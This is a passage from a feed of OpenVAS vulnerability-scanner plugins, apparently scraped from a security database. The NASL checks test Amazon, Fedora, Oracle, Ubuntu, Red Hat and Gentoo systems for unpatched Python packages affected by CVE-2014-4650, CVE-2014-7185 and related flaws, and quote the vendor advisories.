"cvelist": ["CVE-2014-7185", "CVE-2014-4650"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120425", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120425", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-440)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120425\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:04 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-440)\");\n script_tag(name:\"insight\", value:\"It was discovered that Python built-in module CGIHTTPServer does not properly handle URL-encoded path separators in URLs which may enable attackers to disclose a CGI script's source code or execute arbitrary scripts in the server's document root. (CVE-2014-4650 )Integer overflow in bufferobject.c in Python before 2.7.8 allows context-dependent attackers to obtain sensitive information from process memory via a large size and offset in a buffer function. (CVE-2014-7185 )\");\n script_tag(name:\"solution\", value:\"Run yum update python27 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-440.html\");\n script_cve_id(\"CVE-2014-7185\", \"CVE-2014-4650\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"python27-tools\", rpm:\"python27-tools~2.7.8~6.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-debuginfo\", rpm:\"python27-debuginfo~2.7.8~6.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-devel\", rpm:\"python27-devel~2.7.8~6.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-test\", rpm:\"python27-test~2.7.8~6.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27-libs\", rpm:\"python27-libs~2.7.8~6.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"python27\", rpm:\"python27~2.7.8~6.74.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:55:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1752", "CVE-2014-4650"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-04-23T00:00:00", "id": "OPENVAS:1361412562310869288", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869288", "type": "openvas", "title": "Fedora Update for python FEDORA-2015-6010", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for python FEDORA-2015-6010\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869288\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-23 07:33:01 +0200 (Thu, 23 Apr 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2014-4650\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for python FEDORA-2015-6010\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"python on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-6010\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-April/155769.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~16.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "Oracle Linux Local Security Checks ELSA-2015-2101", "modified": "2018-09-28T00:00:00", "published": "2015-11-24T00:00:00", "id": "OPENVAS:1361412562310122760", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122760", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2015-2101", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2015-2101.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122760\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-11-24 10:17:32 +0200 (Tue, 24 Nov 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2015-2101\");\n script_tag(name:\"insight\", value:\"ELSA-2015-2101 - python security, bug fix, and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2015-2101\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2015-2101.html\");\n script_cve_id(\"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2013-1752\", \"CVE-2014-4650\", \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux7\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-debug\", rpm:\"python-debug~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-test\", rpm:\"python-test~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"python-tools\", rpm:\"python-tools~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"tkinter\", rpm:\"tkinter~2.7.5~34.0.1.el7\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2015-06-26T00:00:00", "id": "OPENVAS:1361412562310842261", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842261", "type": "openvas", "title": "Ubuntu Update for python2.7 USN-2653-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for python2.7 USN-2653-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842261\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-06-26 06:25:01 +0200 (Fri, 26 Jun 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for python2.7 USN-2653-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python2.7'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"It was discovered that multiple Python\nprotocol libraries incorrectly limited certain data when connecting to servers.\nA malicious ftp, http, imap, nntp, pop or smtp server could use this issue to\ncause a denial of service. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking\ngzip-compressed HTTP bodies. A malicious server could use this issue to\ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain\nargument. An attacker could possibly use this issue to read arbitrary\nmemory and expose sensitive information. This issue only affected Ubuntu\n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled\nURL-encoded path separators in URLs. A remote attacker could use this issue\nto expose sensitive information, or possibly execute arbitrary code. This\nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in\nbuffer functions. An attacker could possibly use this issue to read\narbitrary memory and obtain sensitive information. This issue only affected\nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)\");\n script_tag(name:\"affected\", value:\"python2.7 on Ubuntu 14.10,\n Ubuntu 14.04 LTS,\n Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"USN\", value:\"2653-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-2653-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(14\\.10|14\\.04 LTS|12\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.8-10ubuntu1.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.2-1ubuntu0.1\", rls:\"UBUNTU14.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.6-8ubuntu0.2\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.4-minimal\", ver:\"3.4.0-2ubuntu1.1\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"python2.7\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python2.7-minimal\", ver:\"2.7.3-0ubuntu3.8\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"python3.2-minimal\", ver:\"3.2.3-0ubuntu3.7\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T14:56:26", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2015-11-20T00:00:00", "id": "OPENVAS:1361412562310871501", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871501", "type": "openvas", "title": "RedHat Update for python RHSA-2015:2101-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for python RHSA-2015:2101-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871501\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-11-20 06:24:47 +0100 (Fri, 20 Nov 2015)\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-1753\", \"CVE-2014-4616\", \"CVE-2014-4650\",\n \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for python RHSA-2015:2101-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'python'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Python is an interpreted, interactive,\nobject-oriented programming language often compared to Tcl, Perl, Scheme, or\nJava. Python includes modules, classes, exceptions, very high level dynamic\ndata types and dynamic typing. Python supports interfaces to many system calls\nand libraries, as well as to various windowing systems (X11, Motif, Tk, Mac and\nMFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n * Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an 'Invalid\nargument' error. Subprocesses h ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n script_tag(name:\"affected\", value:\"python on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_xref(name:\"RHSA\", value:\"2015:2101-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2015-November/msg00019.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"python\", rpm:\"python~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-debuginfo\", rpm:\"python-debuginfo~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-devel\", rpm:\"python-devel~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"python-libs\", rpm:\"python-libs~2.7.5~34.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1912", "CVE-2014-2667", "CVE-2013-7338", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-9365"], "description": "Gentoo Linux Local Security Checks GLSA 201503-10", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121364", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121364", "type": "openvas", "title": "Gentoo Security Advisory GLSA 201503-10", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201503-10.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121364\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:40 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201503-10\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in Python. Please review the CVE identifiers referenced below for details.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201503-10\");\n script_cve_id(\"CVE-2013-1752\", \"CVE-2013-7338\", \"CVE-2014-1912\", \"CVE-2014-2667\", \"CVE-2014-4616\", \"CVE-2014-7185\", \"CVE-2014-9365\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201503-10\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 3.3.5-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.9-r1\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.10\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.11\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.12\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.13\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.14\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(\"ge 2.7.15\"), vulnerable: make_list() )) != NULL) {\n\n report += res;\n}\nif((res=ispkgvuln(pkg:\"dev-lang/python\", unaffected: make_list(), vulnerable: make_list(\"lt 3.3.5-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) 